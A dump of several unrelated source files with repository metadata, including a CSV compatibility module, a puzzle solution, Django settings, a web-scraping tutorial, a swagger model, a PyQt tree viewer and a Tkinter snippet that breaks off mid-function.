url = "file:data/multilingual/Latn.QVA/Sun-ExtA_16/udhr_Latn.QVA_Sun-ExtA_16.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| [
"[email protected]"
] | |
310ef3f7f502ac9fca2d6fc43f37500bd8a533f7 | 3e4c3b6a6ba770fa18e9f072b1cfb58207f96b30 | /openaddr/compat.py | ec93ded08da55c579f23fc715124f0d6f8c05740 | [
"ISC"
] | permissive | cbmeeks/machine | 931b53657db3bb0b960006ccc6abd67fd41d704a | 39652f0614597e2b56973ded9f61a1a2a208da2e | refs/heads/master | 2020-12-26T00:46:01.112727 | 2016-07-31T03:41:06 | 2016-07-31T03:41:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,599 | py | import sys
import io
PY2 = (sys.version_info[0] == 2)
if PY2:
import unicodecsv, subprocess32, uritemplate
unicodecsv.field_size_limit(sys.maxsize)
check_output = subprocess32.check_output
CalledProcessError = subprocess32.CalledProcessError
TimeoutExpired = subprocess32.TimeoutExpired
csvIO = io.BytesIO
def csvreader(file, encoding=None, **kwargs):
''' Pass encoding to unicodecsv
'''
if encoding is not None:
kwargs['encoding'] = encoding
if 'delimiter' in kwargs:
kwargs['delimiter'] = str(kwargs['delimiter'])
return unicodecsv.reader(file, **kwargs)
def csvwriter(file, encoding=None, **kwargs):
''' Pass encoding to unicodecsv
'''
if encoding is not None:
kwargs['encoding'] = encoding
return unicodecsv.writer(file, **kwargs)
def csvDictReader(file, encoding=None, delimiter=None, **kwargs):
''' Pass encoding to unicodecsv
'''
# Python2 unicodecsv requires this be not unicode
if delimiter is not None:
kwargs['delimiter'] = delimiter.encode('ascii')
if encoding is not None:
kwargs['encoding'] = encoding
return unicodecsv.DictReader(file, **kwargs)
def csvDictWriter(file, fieldnames, encoding=None, delimiter=None, **kwargs):
''' Pass encoding to unicodecsv
'''
# Python2 unicodecsv requires this be not unicode
if delimiter is not None:
kwargs['delimiter'] = delimiter.encode('ascii')
if encoding is not None:
kwargs['encoding'] = encoding
return unicodecsv.DictWriter(file, fieldnames, **kwargs)
def csvopen(filename, mode='r', encoding=None):
''' Discard encoding
'''
return io.FileIO(filename, mode=mode)
def expand_uri(template, args):
'''
'''
new_args = {k: v for (k, v) in args.items() if not hasattr(v, 'encode')}
new_args.update({k: v.encode('utf8') for (k, v) in args.items() if hasattr(v, 'encode')})
return uritemplate.expand(template, new_args)
from future import standard_library
standard_library.install_aliases()
else:
import csv, subprocess
from uritemplate import expand as expand_uri
standard_library = None
check_output = subprocess.check_output
CalledProcessError = subprocess.CalledProcessError
TimeoutExpired = subprocess.TimeoutExpired
csvIO = io.StringIO
def csvreader(file, encoding=None, **kwargs):
''' Discard encoding
'''
if 'delimiter' in kwargs:
kwargs['delimiter'] = str(kwargs['delimiter'])
return csv.reader(file, **kwargs)
def csvwriter(file, encoding=None, **kwargs):
''' Discard encoding
'''
return csv.writer(file, **kwargs)
def csvDictReader(file, encoding=None, **kwargs):
''' Discard encoding
'''
return csv.DictReader(file, **kwargs)
def csvDictWriter(file, fieldnames, encoding=None, **kwargs):
''' Discard encoding
'''
return csv.DictWriter(file, fieldnames, **kwargs)
def csvopen(filename, mode='r', encoding=None):
''' Pass encoding to io.open
'''
return io.open(filename, mode=mode, encoding=encoding)
try:
import cairo
except ImportError:
# http://stackoverflow.com/questions/11491268/install-pycairo-in-virtualenv
import cairocffi as cairo
| [
"[email protected]"
] | |
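A minimal usage sketch for the CSV compatibility helpers in the record above; the import path, file name, and field names are assumptions for illustration rather than anything stated in this document:

```python
# Hypothetical round-trip through the compat helpers defined in the record above.
from openaddr.compat import csvopen, csvDictWriter, csvDictReader

with csvopen('example.csv', mode='w', encoding='utf8') as f:
    writer = csvDictWriter(f, fieldnames=['lon', 'lat'], encoding='utf8')
    writer.writeheader()
    writer.writerow({'lon': '12.49', 'lat': '41.89'})

with csvopen('example.csv', mode='r', encoding='utf8') as f:
    for row in csvDictReader(f, encoding='utf8'):
        print(row['lon'], row['lat'])
```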
d680686b38adb8e9cdfc5bf3e14016b01354af3a | d1c6de4e0d4aafbe1e7d15a02487494f86bf9b7e | /알고리즘문제/내려가기.py | 1515a653c108bd21017b437c35fc3fc9e25479c1 | [] | no_license | kdm604/TIL | d2ce2122e0b828a595530ac2a405a4661cf60205 | 554bbd8e884f4e7fbebdefbfa22a1a5eee0fa452 | refs/heads/master | 2023-01-11T21:41:57.845549 | 2020-03-24T08:55:10 | 2020-03-24T08:55:10 | 195,938,033 | 0 | 0 | null | 2023-01-05T01:14:37 | 2019-07-09T05:23:00 | Python | UTF-8 | Python | false | false | 903 | py | import sys
N = int(input())
ans_max = [[0 for _ in range(3)]for _ in range(2)]
ans_min = [[0 for _ in range(3)]for _ in range(2)]
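# Rolling DP: row i only depends on row i-1, so ans_max/ans_min keep just two rows
# (indexed by i % 2), one best/worst path sum per column.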
for i in range(1, N+1):
arr = list(map(int, sys.stdin.readline().split()))
ans_max[i % 2][0] = max(ans_max[(i -1)%2][0], ans_max[(i-1) %2][1]) + arr[0]
ans_max[i % 2][1] = max(ans_max[(i - 1) % 2][0], ans_max[(i - 1) % 2][1], ans_max[(i - 1) % 2][2]) + arr[1]
ans_max[i % 2][2] = max(ans_max[(i - 1) % 2][1], ans_max[(i - 1) % 2][2]) + arr[2]
ans_min[i % 2][0] = min(ans_min[(i - 1) % 2][0], ans_min[(i - 1) % 2][1]) + arr[0]
ans_min[i % 2][1] = min(ans_min[(i - 1) % 2][0], ans_min[(i - 1) % 2][1], ans_min[(i - 1) % 2][2]) + arr[1]
ans_min[i % 2][2] = min(ans_min[(i - 1) % 2][1], ans_min[(i - 1) % 2][2]) + arr[2]
print(max(ans_max[N%2][0], ans_max[N%2][1], ans_max[N%2][2]))
print(min(ans_min[N%2][0], ans_min[N%2][1], ans_min[N%2][2])) | [
"[email protected]"
] | |
8f3cc002c398732246f1e2d85326681bd76a8411 | c5a8f6dd4e5ebc43f02923704325620f0787b2f4 | /visual-experiments/rectangular_visualizer.py | 657afe5661a8fb7256dba49930c2c02daf9a6eec | [] | no_license | alex-berman/tforms | 50098501d19de75632426423d02025162bbc94e6 | 046476001609dfa8192c2e373a040d4129975ab6 | refs/heads/master | 2021-01-01T20:00:00.381901 | 2014-03-16T13:44:09 | 2014-03-16T13:44:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 936 | py | import visualizer
from visualizer import File, run
from vector import DirectionalVector, Vector2d
import math
class Chunk:
def peer_position(self):
return Visualizer.bearing_to_border_position(
self.peer.bearing, self.visualizer.width, self.visualizer.height)
class Segment(visualizer.Segment, Chunk):
pass
class Peer(visualizer.Peer):
pass
class Visualizer(visualizer.Visualizer):
@staticmethod
def bearing_to_border_position(bearing, width, height):
radius = math.sqrt(width*width + height*height) / 2
midpoint = Vector2d(width/2, height/2)
circle_position = midpoint + DirectionalVector(bearing - 2*math.pi/4, radius)
return circle_position
def pan_segment(self, segment):
relative_x = segment.pan
space_y = 3
space_x = (relative_x - 0.5) * 5
self.orchestra.place_segment(segment.id, space_x, space_y, segment.duration)
| [
"[email protected]"
] | |
042476a02c8bf29a0201454a2168abe364601a48 | a67d999deafb7d3dac60ad95f66234fe3e79030e | /Python/Advanted/src/chauthoi/myGUItest1.py | 3a9a1c4fe3d7059a5e5b5415c33d5c352348e5ae | [] | no_license | tielse/Example_Python | 1282728a3e38725a48f30a1c49a688b5262be485 | 0bc31f86f16ef98cf3b7ad8a524c27978e47775f | refs/heads/master | 2021-01-02T22:36:58.866922 | 2017-08-04T15:25:17 | 2017-08-04T15:25:17 | 99,355,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | #!/usr/bin/env python 2.7
import Tkinter
from Tkinter import *
Widget=Label(None,text='Hello Python')
Widget.pack()
Widget.mainloop() | [
"[email protected]"
] | |
7a15d93ffe5208e8afe7da36fd5f11f27c9fd337 | 59e8a041435b70f1dfb2464ccef298c69cf8466e | /058_Length_of_Last_Word/tests.py | 22dd861ca481516c780a5c55fa2454e7d4fdcbd3 | [] | no_license | sallowdish/LeetCode | f0aa6c5be864711c75a3583f320ce967d50c55d3 | d12ca00f30a1784802f42f8e76f782d7b72e95a6 | refs/heads/master | 2021-01-21T04:32:02.351940 | 2016-06-25T00:12:22 | 2016-06-25T00:12:22 | 33,152,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | #!/usr/bin/python3
from unittest import TestCase, main
from sol1 import Solution
def split(n):
l = []
for i in n:
l.append(list(i))
return l
class Test(TestCase):
sol = None
def setUp(self):
self.sol = Solution()
def test0(self):
n = ""
self.assertEqual(self.sol.lengthOfLastWord(n) ,0)
def test1(self):
n = " "
self.assertEqual(self.sol.lengthOfLastWord(n) ,0)
def test2(self):
n = " a"
self.assertEqual(self.sol.lengthOfLastWord(n) ,1)
def test3(self):
n = " ab"
self.assertEqual(self.sol.lengthOfLastWord(n) ,2)
def test4(self):
n = " aVb "
self.assertEqual(self.sol.lengthOfLastWord(n) ,3)
def test5(self):
n = " ab IUHB POQPEQJ83894e2"
self.assertEqual(self.sol.lengthOfLastWord(n) ,len("POQPEQJ83894e2"))
if __name__ == "__main__":
# logging.basicConfig( stream=sys.stderr )
# logging.getLogger( "Test.testSomething" ).setLevel( logging.DEBUG )
main()
| [
"[email protected]"
] | |
dcf94f3467263d06f0cdc6a6fd45814921ae79cf | 1e9c9f2a9639db7cdb032aae69cb4d99aef1d3a5 | /hackerEarth/practice/dataStructures/advancedDataStructures/segmentTrees/researchOnNumbers.py | cd843193b38d663316dbb8d7bec57cc27e97e182 | [
"MIT"
] | permissive | sagarnikam123/learnNPractice | f0da3f8acf653e56c591353ab342765a6831698c | 1b3b0cb2cff2f478006626a4c37a99102acbb628 | refs/heads/master | 2023-02-04T11:21:18.211654 | 2023-01-24T14:47:52 | 2023-01-24T14:47:52 | 61,184,927 | 2 | 1 | MIT | 2022-03-06T11:07:18 | 2016-06-15T06:57:19 | Python | UTF-8 | Python | false | false | 2,349 | py | # Research on Numbers
#######################################################################################################################
#
# Bob is studying in a research institute. He is currently researching on integer sequences. He has already done
# some research on famous fibonacci sequence. Now he is trying to investigate patterns
# in a general recursive sequence (Ai)
# Sequence (Ai) is
# Ai = Bi (for i <= k)
# Ai = C1 * Ai-1 + C2 * Ai-2 +.......+ Ck*Ai-k (for i > k)
#
# But while calculating the sequence he realizes that values are growing very fast. So to keep the values small
# he calculates values modulo 109+7 (1000000007) . So that each term of sequence will be less than 109+7.
# While he is busy with his work, his girlfriend is disturbing him a lot. He wants to make her busy with some task.
# He gives her the task of sorting all the terms from Al to Ar of his sequence. She is very quick so he gives
# her same task Q times (of course with different l and r). Since sorting is very boring task so she asks you
# to complete the task.
# You will be given two numbers l and r and you are expected to output all the terms from Al to Ar in non
# decreasing order. But to avoid such a large output, if there are more than 100 terms
# in the output print only first 100.
#
# Input :
# First line contains T, the number of test cases. First line of each test case contains two space separated
# integers Q and k. Next line contains array B of length k. 3rd line contains array C of length k.
# Each of next Q lines contains two space separated integers l and r.
#
# Output :
# For each test case output Q lines. Each line contains terms from Al to Ar in non decreasing order.
# If more than 100 terms are there to output,print only first 100
#
# Constraints :
# 1 <= T <= 3
# 1 <= Q <= 100
# 1 <= k <= 5
# 1 <= Bj,Cj <= 50
# 1 <= l,r <= 10^6
# l <= r
#
# SAMPLE INPUT
# 2
# 4 3
# 1 2 3
# 2 1 1
# 1 5
# 6 8
# 8 9
# 6 9
# 3 4
# 4 5 7 9
# 2 2 1 3
# 2 7
# 10 12
# 100 101
#
# SAMPLE OUTPUT
# 1 2 3 9 23
# 58 148 377
# 377 960
# 58 148 377 960
# 5 7 9 49 138 404
# 9964 29126 85073
# 483689722 905484679
#
#######################################################################################################################
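#
# A minimal sketch (not the original author's solution) of one way to answer the
# queries above: build each test case's sequence once up to the largest r needed
# (mod 1e9+7), then sort each requested slice and keep at most 100 terms.
# The names below (solve_case, B, C, queries) are illustrative only.
MOD = 10 ** 9 + 7

def solve_case(k, B, C, queries):
    max_r = max(r for _, r in queries)
    A = list(B[:k])
    for i in range(k, max_r):
        A.append(sum(C[j] * A[i - 1 - j] for j in range(k)) % MOD)
    return [sorted(A[l - 1:r])[:100] for l, r in queries]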
| [
"[email protected]"
] | |
61bdf96e9e66babc6af5fbb50dce07eacb4d3e7e | b804260baffde6044d0da699ebd01eefd5524897 | /tests/loss/test_loss.py | db2c74e8c2f0e1a7ffec9783b81e8edcb95589ba | [
"MIT"
] | permissive | pfnet/pynif3d | d8112e659c3158cd87f4f88ebb77c653c2a0eb7c | da3680cce7e8fc4c194f13a1528cddbad9a18ab0 | refs/heads/main | 2023-07-15T06:27:27.849842 | 2021-08-18T07:15:13 | 2021-08-18T07:15:13 | 397,141,414 | 72 | 5 | MIT | 2021-08-18T07:15:14 | 2021-08-17T06:53:45 | Python | UTF-8 | Python | false | false | 533 | py | from unittest import TestCase
import torch
from pynif3d.loss import eikonal_loss
class TestLoss(TestCase):
def test_eikonal_loss(self):
x = torch.as_tensor(
[
[0.2936261892, -1.0289776325, 0.1445489526],
[-0.2577984035, -0.7820385098, 0.3506951332],
[-0.4243153632, 0.8669579029, -0.6295363903],
]
)
loss = float(eikonal_loss(x))
expected_loss = 0.0135356029
self.assertAlmostEqual(loss, expected_loss, places=5)
| [
"[email protected]"
] | |
75f86cfb2964f955c6eb729325f89b994094d90b | 4e27edeea65ccbf56751ce8d2dc77a7133b0acd4 | /manage.py | 67c6cd2430e82991dd181c57036a89165333e071 | [] | no_license | TheFifthMan/whitehat | f1e6faf39c7e56d79ac462de4de847ebd531ecb1 | 944ff548ec18b2c306af63a53baff9940fdbec84 | refs/heads/master | 2020-04-08T18:40:27.924936 | 2018-11-29T06:37:13 | 2018-11-29T06:37:13 | 159,619,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'whitehat.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
1b4972c56701c6145e833481d3454ceb0bfc240a | 62980875b6e08d0099b1662fa3148ae29986fb64 | /BeautifulSoup/6_bs4.py | 898014028b10426db05bb94eb1a9f99b419b19ca | [] | no_license | kogkuemryong/Python_WebScraping- | 9db659c9a11c2677074fcac7f7029ec8541cb4f5 | 51cf7e7e71ce7c90b68f70daa43785671350dfb5 | refs/heads/master | 2022-12-12T17:01:27.142178 | 2020-09-08T16:48:19 | 2020-09-08T16:48:19 | 293,404,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,019 | py | import requests
from bs4 import BeautifulSoup
url ='https://comic.naver.com/webtoon/weekday.nhn'
res = requests.get(url) # fetch the url
res.raise_for_status() # stop the program if the request failed
soup = BeautifulSoup(res.text, 'lxml') # take the text we downloaded and parse it with lxml
                                       # to build a BeautifulSoup object
'''
Use these when you already know the structure of the page
print(soup.title) # <title>네이버 만화 > 요일별 웹툰 > 전체웹툰</title>
print(soup.title.get_text()) # text only / 네이버 만화 > 요일별 웹툰 > 전체웹툰
print(soup.a) # print the first a element in the whole soup
print(soup.a.attrs) # print the attribute info of the a element
print(soup.a['href']) # print the 'value' of the a element's href attribute
'''
# print(soup.find('a', attrs={'class' :'Nbtn_upload'})) # find the a element whose class is 'Nbtn_upload'
# print(soup.find(attrs={'class' :'Nbtn_upload'})) # find any element whose class is 'Nbtn_upload'
# print(soup.find('li', attrs={'class':'rank01'}))
# rank1 = soup.find('li', attrs={'class':'rank01'})
# print(rank1.a.get_text()) # text only
# print (rank1.next_sibling) # prints nothing
# rank2 = rank1.next_sibling.next_sibling # steps across to the sibling element
# rank3 = rank2.next_sibling.next_sibling
# rank4 = rank3.next_sibling.next_sibling
# print(rank4.get_text())
# rank2 = rank3.previous_sibling.previous_sibling # go back to the previous sibling
# print(rank1.parent) # go up to the parent
# rank2 = rank1.find_next_sibling('li')
# print(rank2.a.get_text()) # handy substitute for chaining next_sibling many times
#
# rank3 = rank2.find_next_sibling('li')
# print(rank3.a.get_text())
#
# rank2 = rank3.find_previous_sibling('li')
# print(rank2.a.get_text())
# print (rank1.find_next_siblings('li'))
webtooon = soup.find('a' , text = '인생존망-43화 : 너 뽀뽀하려고 그랬지!!!')
print(webtooon)
| [
"[email protected]"
] | |
2520da0ffe6d528d917b6d76d7e86d7767ae8d15 | 8f4488494507da4cb6f15073b8aa2e6f97fabb35 | /test/integration/local/test_tensorflow.py | c85f8f5d446253c4b38bdc7e634c6851379fd0e4 | [
"Apache-2.0"
] | permissive | aws/sagemaker-training-toolkit | 025966a1216aeb78b58f7abab19c6ccb01b0897d | e4a765e699e16c5849bbdfd789edbfc9820fdd77 | refs/heads/master | 2023-08-21T12:33:59.831391 | 2023-08-08T16:46:40 | 2023-08-08T16:46:40 | 212,439,434 | 415 | 110 | Apache-2.0 | 2023-09-07T19:58:23 | 2019-10-02T20:54:32 | Python | UTF-8 | Python | false | false | 1,528 | py | # Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import subprocess
import sys
import pytest
from sagemaker.estimator import Estimator
@pytest.fixture(scope="module", autouse=True)
def container():
try:
command = (
"docker run --name sagemaker-training-toolkit-test "
"sagemaker-training-toolkit-test:tensorflow train"
)
proc = subprocess.Popen(command.split(), stdout=sys.stdout, stderr=subprocess.STDOUT)
yield proc.pid
finally:
subprocess.check_call("docker rm -f sagemaker-training-toolkit-test".split())
def test_tensorflow_exceptions(capsys):
with pytest.raises(Exception):
estimator = Estimator(
image_uri="sagemaker-training-toolkit-test:tensorflow",
role="SageMakerRole",
instance_count=1,
instance_type="local",
)
estimator.fit()
stdout = capsys.readouterr().out
assert "XlaRuntimeError" in stdout
| [
"[email protected]"
] | |
538432edd63d9503879fed091c2da849b88aeb19 | d7ccb4225f623139995a7039f0981e89bf6365a4 | /.history/mall/settings_20211011171802.py | d6ac69d215da3f819a7996e8f1d92e8ab5d563bf | [] | no_license | tonnymuchui/django-mall | 64fd4abc3725c1bd0a3dcf20b93b490fe9307b37 | 55c083d8433be3c77adc61939cd197902de4ce76 | refs/heads/master | 2023-08-23T04:59:20.418732 | 2021-10-13T15:59:37 | 2021-10-13T15:59:37 | 415,668,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,642 | py | """
Django settings for mall project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
TEMPLATE_DIR = os.path.join(BASE_DIR,"templates")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-#l0ij4e$3v@&xi3i#y$19f#_@z(yv+5yw$kc+02!-)g%ny%oi8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'category',
'accounts',
'store',
'carts'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mall.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'category.context_processors.menu_links',
'cart.cont'
],
},
},
]
WSGI_APPLICATION = 'mall.wsgi.application'
AUTH_USER_MODEL = 'accounts.Account'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR /'static'
STATICFILES_DIRS = [
'mall/static',
]
# media files configuration
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR /'media'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
2ea6a54e6d5e934338510fc52ec20c0e4d55851c | ce6cb09c21470d1981f1b459293d353407c8392e | /docs/jnpr_healthbot_swagger/swagger_client/models/rule_schema_formula1_or.py | 71314684086751f0563ed538b08bac277bdc9834 | [
"Apache-2.0"
] | permissive | minefuto/healthbot-py-client | c4be4c9c3153ef64b37e5344bf84154e93e7b521 | bb81452c974456af44299aebf32a73abeda8a943 | refs/heads/master | 2022-12-04T07:47:04.722993 | 2020-05-13T14:04:07 | 2020-05-13T14:04:07 | 290,145,286 | 0 | 0 | Apache-2.0 | 2020-08-25T07:27:54 | 2020-08-25T07:27:53 | null | UTF-8 | Python | false | false | 5,021 | py | # coding: utf-8
"""
Healthbot APIs
API interface for Healthbot application # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class RuleSchemaFormula1Or(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'left_vector': 'str',
'right_vector': 'str'
}
attribute_map = {
'left_vector': 'left-vector',
'right_vector': 'right-vector'
}
def __init__(self, left_vector=None, right_vector=None): # noqa: E501
"""RuleSchemaFormula1Or - a model defined in Swagger""" # noqa: E501
self._left_vector = None
self._right_vector = None
self.discriminator = None
self.left_vector = left_vector
self.right_vector = right_vector
@property
def left_vector(self):
"""Gets the left_vector of this RuleSchemaFormula1Or. # noqa: E501
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:return: The left_vector of this RuleSchemaFormula1Or. # noqa: E501
:rtype: str
"""
return self._left_vector
@left_vector.setter
def left_vector(self, left_vector):
"""Sets the left_vector of this RuleSchemaFormula1Or.
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:param left_vector: The left_vector of this RuleSchemaFormula1Or. # noqa: E501
:type: str
"""
if left_vector is None:
raise ValueError("Invalid value for `left_vector`, must not be `None`") # noqa: E501
if left_vector is not None and not re.search(r'^@[a-z][a-zA-Z0-9_-]*$', left_vector): # noqa: E501
raise ValueError(r"Invalid value for `left_vector`, must be a follow pattern or equal to `/^@[a-z][a-zA-Z0-9_-]*$/`") # noqa: E501
self._left_vector = left_vector
@property
def right_vector(self):
"""Gets the right_vector of this RuleSchemaFormula1Or. # noqa: E501
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:return: The right_vector of this RuleSchemaFormula1Or. # noqa: E501
:rtype: str
"""
return self._right_vector
@right_vector.setter
def right_vector(self, right_vector):
"""Sets the right_vector of this RuleSchemaFormula1Or.
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:param right_vector: The right_vector of this RuleSchemaFormula1Or. # noqa: E501
:type: str
"""
if right_vector is None:
raise ValueError("Invalid value for `right_vector`, must not be `None`") # noqa: E501
if right_vector is not None and not re.search(r'^@[a-z][a-zA-Z0-9_-]*$', right_vector): # noqa: E501
raise ValueError(r"Invalid value for `right_vector`, must be a follow pattern or equal to `/^@[a-z][a-zA-Z0-9_-]*$/`") # noqa: E501
self._right_vector = right_vector
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RuleSchemaFormula1Or, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RuleSchemaFormula1Or):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
4c0d4d4150b62d2151f73bd99f474cc1fcdc41af | e01dde12be71c40065a9d6d2b1451f837c42a41e | /py_trees_ros_viewer/viewer.py | 754f696ee24634ae00238eb788ed5305d7f1e131 | [
"BSD-3-Clause"
] | permissive | neelj09/py_trees_ros_viewer | 29336ce5a7f7592ffb67c0170b42902d16fea5d3 | 1fbd7877fa4bcb53119b3111db26ce87ec8ccebd | refs/heads/master | 2022-04-09T00:48:10.260221 | 2019-08-10T02:54:03 | 2019-08-10T02:54:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,833 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# License: BSD
# https://github.com/splintered-reality/py_trees_ros_viewer/raw/devel/LICENSE
#
##############################################################################
# Documentation
##############################################################################
"""
A qt-javascript application for viewing executing or replaying py_trees
"""
##############################################################################
# Imports
##############################################################################
import functools
import json
import signal
import sys
import time
import PyQt5.QtCore as qt_core
import PyQt5.QtWidgets as qt_widgets
from . import console
from . import trees
from . import main_window
##############################################################################
# Helpers
##############################################################################
def send_tree_response(reply):
console.logdebug("reply: '{}' [viewer]".format(reply))
@qt_core.pyqtSlot()
def send_tree(web_view_page, demo_trees, unused_checked):
send_tree.index = 0 if send_tree.index == 2 else send_tree.index + 1
demo_trees[send_tree.index]['timestamp'] = time.time()
console.logdebug("send: tree '{}' [{}][viewer]".format(
send_tree.index, demo_trees[send_tree.index]['timestamp'])
)
web_view_page.runJavaScript(
"render_tree({tree: '%s'});" % json.dumps(demo_trees[send_tree.index]),
send_tree_response
)
send_tree.index = 0
##############################################################################
# Main
##############################################################################
def main():
# logging
console.log_level = console.LogLevel.DEBUG
# the players
app = qt_widgets.QApplication(sys.argv)
demo_trees = trees.create_demo_tree_list()
window = main_window.MainWindow(
default_tree=demo_trees[0]
)
# sig interrupt handling
# use a timer to get out of the gui thread and
# permit python a chance to catch the signal
# https://stackoverflow.com/questions/4938723/what-is-the-correct-way-to-make-my-pyqt-application-quit-when-killed-from-the-co
def on_shutdown(unused_signal, unused_frame):
console.logdebug("received interrupt signal [viewer]")
window.close()
signal.signal(signal.SIGINT, on_shutdown)
timer = qt_core.QTimer()
timer.timeout.connect(lambda: None)
timer.start(250)
# sigslots
window.ui.send_button.clicked.connect(
functools.partial(
send_tree,
window.ui.web_view_group_box.ui.web_engine_view.page(),
demo_trees
)
)
# qt bringup
window.show()
result = app.exec_()
# shutdown
sys.exit(result)
| [
"[email protected]"
] | |
15bd7e332a59184de848af3cc92208ff3dcc0330 | 7d1e9acf94a5e4533d3ef5828b568e89c29519a3 | /11-Message Box/MessageBox.py | a6e635c724e37df0204a8b500c9173b5d056455a | [] | no_license | abuzarrizvi/Python-GUI-s-With-TKinter | c960e3629589d25b72f6720caebb552352e77976 | d5c7843cdd3203294762ae92b6503ecb55d083f1 | refs/heads/master | 2020-07-06T03:17:56.798236 | 2019-08-23T10:56:41 | 2019-08-23T10:56:41 | 202,871,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | from tkinter import *
from PIL import ImageTk, Image
from tkinter import messagebox
root = Tk()
root.title('Learn To Code at Github.com')
root.iconbitmap('Martz90-Circle-Camera.ico')
#showinfo, showwarning, showerror, askquestion, askokcancel, askyesno
def popup():
